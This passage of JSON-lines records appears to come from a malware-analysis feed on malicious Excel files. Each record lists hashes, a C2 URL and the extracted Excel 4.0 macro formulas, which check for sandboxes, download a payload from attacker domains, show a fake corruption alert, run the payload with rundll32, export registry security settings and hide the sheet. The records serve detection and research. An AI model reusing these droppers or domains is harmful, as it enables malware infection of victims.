,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TP7P4WY0A7\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b4901dbc49ff192d7c0049f3392c16fada4d56dbcd3940f36902520c1d52f7b7"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b4901dbc49ff192d7c0049f3392c16fada4d56dbcd3940f36902520c1d52f7b7","filesize":152576,"md5":"56354ba8380ed13d2336b5b946ad5cad","sha1":"4793534a4012a59f134b54acd500319303e5fa15","sha256":"b4901dbc49ff192d7c0049f3392c16fada4d56dbcd3940f36902520c1d52f7b7","sha512":"886d23da123bca0c21b18c3cb670add1e19863b81bcdb2aa8f7cfb6066c0e1e75e59827a6aa00d24ce550f59afccd05d63922f8f21c74b8c4a4725f72728e161","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b4901dbc49ff192d7c0049f3392c16fada4d56dbcd3940f36902520c1d52f7b7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HND4fLoyFs\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b49492478498dd82c94f1d5fbc880df382d56413df72bd1453782030e9d447b0"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b49492478498dd82c94f1d5fbc880df382d56413df72bd1453782030e9d447b0","filesize":168448,"md5":"e382921e953aa98b683fb73a8e4a9665","sha1":"dcfb0a1881aa29d52fb05bae8ce0957fbf44e706","sha256":"b49492478498dd82c94f1d5fbc880df382d56413df72bd1453782030e9d447b0","sha512":"9923ffd44d6ac2adb5152de90b00b1a6e3f0f8fd8ee2524bf7c9d690fadfb713279132d58d4b0ccce79540da15b32c842f2aeadd3fd67a2c11eb1aef890289ad","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b49492478498dd82c94f1d5fbc880df382d56413df72bd1453782030e9d447b0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"89l50ojVQD\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b4b7579fea01a599764ec94dc2d8a4172c2706260942d677f1b9fdab9c593ff1"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b4b7579fea01a599764ec94dc2d8a4172c2706260942d677f1b9fdab9c593ff1","filesize":168448,"md5":"5e801e29bacc825d5924613fdff06249","sha1":"2a7494d0df4c2ceaac6d9e6334c20e62e09e38cc","sha256":"b4b7579fea01a599764ec94dc2d8a4172c2706260942d677f1b9fdab9c593ff1","sha512":"aaa3b63b6d9cb26ff41abbac79d1087fbfc8dcaa13531d9327cc499d8172df815ef1b9d0182a0ba81ff16c972aa1ae2d5ada45ae663ba7232a6670a6062e73f4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b4b7579fea01a599764ec94dc2d8a4172c2706260942d677f1b9fdab9c593ff1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0IvzlMdMJs\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b4e685449cc48843102c9731fbd70408efb98fa959723fd5ba55db6ee2e73a8a"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b4e685449cc48843102c9731fbd70408efb98fa959723fd5ba55db6ee2e73a8a","filesize":185344,"md5":"97b533cc01e85b31801c14ec609d31dc","sha1":"ea28172200883e576ca785e73ed73d23abe90b8c","sha256":"b4e685449cc48843102c9731fbd70408efb98fa959723fd5ba55db6ee2e73a8a","sha512":"6dbf4ebbc8e51e8b705f01b45350f3d5f38422703a6586c2b657a9b2e0d0801b76d3c26cca159da816ab7a08f8e8852d64b4fdb801e7076100bdfaf331a8e0d6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b4e685449cc48843102c9731fbd70408efb98fa959723fd5ba55db6ee2e73a8a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b4eb73864c0f3b38837635c86d8f9df673fc55a900890438b8d004e05fdef3f3"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b4eb73864c0f3b38837635c86d8f9df673fc55a900890438b8d004e05fdef3f3","filesize":206336,"md5":"a7b82c5d1dfb4fa970ff3ea270bedad5","sha1":"a50dff61c84bd73ddc34305d3343abb24dd13d65","sha256":"b4eb73864c0f3b38837635c86d8f9df673fc55a900890438b8d004e05fdef3f3","sha512":"193eaf230f57c4a53e41ed4c9a894006b3a59acb11f7466808c35d1efad22a459bc81837adcd05bdd2464c9ba5a802f9ae2cf6d400909dc5d759e4773e0a99bf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b4eb73864c0f3b38837635c86d8f9df673fc55a900890438b8d004e05fdef3f3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AOwvQ27AmF\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b50485514651387fbc2de9166f03551a7c51d49d03a0f5b34d131ecffa84ef0a"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b50485514651387fbc2de9166f03551a7c51d49d03a0f5b34d131ecffa84ef0a","filesize":167424,"md5":"5e2df795b3f6608c728ce07aa3757b76","sha1":"4e237372c1287094216ea49d1730ff8e65451ffd","sha256":"b50485514651387fbc2de9166f03551a7c51d49d03a0f5b34d131ecffa84ef0a","sha512":"07adbcec14e176569b5accb03d9b26d66781cd27588256f5bd25d735519bd77e01471b1041a7e92f80edb96eac69ca472ea595f477956c948b5a65bb8983299a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b50485514651387fbc2de9166f03551a7c51d49d03a0f5b34d131ecffa84ef0a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"L856q9vcFy\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b50eb27af8fc37256fa5a3aabf5794fd13c3994ac32e1f30ac032f45cdaad059"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b50eb27af8fc37256fa5a3aabf5794fd13c3994ac32e1f30ac032f45cdaad059","filesize":144384,"md5":"4da3efd46c0f79afb9e206fa817e98a2","sha1":"aa1ab64b52c1c01180db763ea30a9f2eeec713d5","sha256":"b50eb27af8fc37256fa5a3aabf5794fd13c3994ac32e1f30ac032f45cdaad059","sha512":"9615d2529b25780d65f3e63ac51f1b6ae20d940260e90d403305433b030e1fc3fe1fd44aa17760d92c9960da7d5f363ccc041e9c59ec77ac7a4ca301b5ae7c6a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b50eb27af8fc37256fa5a3aabf5794fd13c3994ac32e1f30ac032f45cdaad059.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"jAVjQECMqK\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b5142885d569755983d069bd89c72c4d109dccb51bcd1c2426c7a28b04070449"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b5142885d569755983d069bd89c72c4d109dccb51bcd1c2426c7a28b04070449","filesize":116224,"md5":"af9de28cfaf67c746937457c68579c3a","sha1":"6102aeb55a9c61136f569291f5307be8c16d970d","sha256":"b5142885d569755983d069bd89c72c4d109dccb51bcd1c2426c7a28b04070449","sha512":"24820edca46ff69af1cd4885d23981097bbae6724470dcb100e51111a5a62f0c3d016bca7ae865ff56dedc298a140d7eaf9fa94f0d6224e79efe4489784d0764","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b5142885d569755983d069bd89c72c4d109dccb51bcd1c2426c7a28b04070449.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"t8PAhDJ0CV\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b5207efd214ee7573ab951bb8f9fd41b4d2cae742c09770c3b499bd52e3894cb"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b5207efd214ee7573ab951bb8f9fd41b4d2cae742c09770c3b499bd52e3894cb","filesize":206336,"md5":"3faee3a84b67118227e1f97f8a1d6a4e","sha1":"513e4661f52e574859cd6b0f301d17223013f9b0","sha256":"b5207efd214ee7573ab951bb8f9fd41b4d2cae742c09770c3b499bd52e3894cb","sha512":"529748531ce4497e1ab658b40a4673bd7a6241ab50d419175421bdd2388f04e33f5711b8accacdf78956189942e72caf7f350f16a2a6654089fd2d0ea763fe82","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b5207efd214ee7573ab951bb8f9fd41b4d2cae742c09770c3b499bd52e3894cb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"p4eLJUxfCi\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b52669231efb406f1a34d33877cc6e07b7758672dfe62a715480e7985334a51c"},"analysis":{"reported":"2020-04-09T16:18:27Z","score":10},"files":[{"filename":"b52669231efb406f1a34d33877cc6e07b7758672dfe62a715480e7985334a51c","filesize":171008,"md5":"6cd4e502e96e8af239ba9920355971f1","sha1":"0623f0f534d0ac1f278b949d4acde8f0a3f9f5ed","sha256":"b52669231efb406f1a34d33877cc6e07b7758672dfe62a715480e7985334a51c","sha512":"a1bd7b859001b2719998a2b7c312477cb37a516c94c9886c625dccf7cdbf6ca557eb982910fda4b3d82577c6115258ea66aeef7422f75899e16c2b44b641d613","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b52669231efb406f1a34d33877cc6e07b7758672dfe62a715480e7985334a51c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fvMsMbWhj2\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b5316f585bc85e268c853ecf8cfe9e7abf3869b19a991122592e99ff78e9bd93"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b5316f585bc85e268c853ecf8cfe9e7abf3869b19a991122592e99ff78e9bd93","filesize":185344,"md5":"64fa7eeccdb0ab67d712b55493fbef81","sha1":"2aeee014a02170c5ccde69d64c85c7eb7c80a955","sha256":"b5316f585bc85e268c853ecf8cfe9e7abf3869b19a991122592e99ff78e9bd93","sha512":"0bbdec64c4f3cba4023429a1cefe715cedd449fbef4c39a5127c738fe7a62cb2d08eb4a39b5f1f9cbdf6a96b1d5d04a1690b817348ca6fef254a18f43f7c5d70","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b5316f585bc85e268c853ecf8cfe9e7abf3869b19a991122592e99ff78e9bd93.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b538a6f44c8ca80b32bf3ee4686f6a443d62f971d4d63781ffc4ad0b70334034"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b538a6f44c8ca80b32bf3ee4686f6a443d62f971d4d63781ffc4ad0b70334034","filesize":206336,"md5":"a881eec074ded2b3ffa76724240c2684","sha1":"14c735c965674b3435019aae24b32030b1abfa6e","sha256":"b538a6f44c8ca80b32bf3ee4686f6a443d62f971d4d63781ffc4ad0b70334034","sha512":"830891b92211ef382f4ea710c5c2e5752681cee498235e39500589870677a7083b74528863299f58adea4445c96bf2393f5ced8eb339fd12a9032977a6fc5b5b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b538a6f44c8ca80b32bf3ee4686f6a443d62f971d4d63781ffc4ad0b70334034.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZG6qrdV6kP\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b539620df91516b4efe3bd821804b8ee83de39e8b7bed2529943612d3b108240"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b539620df91516b4efe3bd821804b8ee83de39e8b7bed2529943612d3b108240","filesize":206336,"md5":"b30a16e363dbdd5ce2d7446de86730fe","sha1":"fb51df8941481ec7089e00017726edf6412a4d7a","sha256":"b539620df91516b4efe3bd821804b8ee83de39e8b7bed2529943612d3b108240","sha512":"d66548565e39a70c0bf2a290c826a719612f2f8960cb573cc8eff616470b7c3ae2a076ff1d95e3c8725260128753899bc619be9af69893bfd49d3b23845b805d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b539620df91516b4efe3bd821804b8ee83de39e8b7bed2529943612d3b108240.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"etdALL70rU\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b54309feb063294355551f56a7c19430b6842c419a69ec8f5a38d418588b6e59"},"analysis":{"reported":"2020-04-09T16:18:28Z","score":10},"files":[{"filename":"b54309feb063294355551f56a7c19430b6842c419a69ec8f5a38d418588b6e59","filesize":185344,"md5":"fad2c9d0b5239ed1b0b9d0eb69fdf53d","sha1":"43ef5d6de584ccdaf71e5323a8d8abe44ada0c73","sha256":"b54309feb063294355551f56a7c19430b6842c419a69ec8f5a38d418588b6e59","sha512":"49fb321374345a15e46001e47297021a4ccf216c544e88628ba574a735331442b672670764a565ebf47ad70af2561fe43343a79a0a87274357628cab75a81de1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b54309feb063294355551f56a7c19430b6842c419a69ec8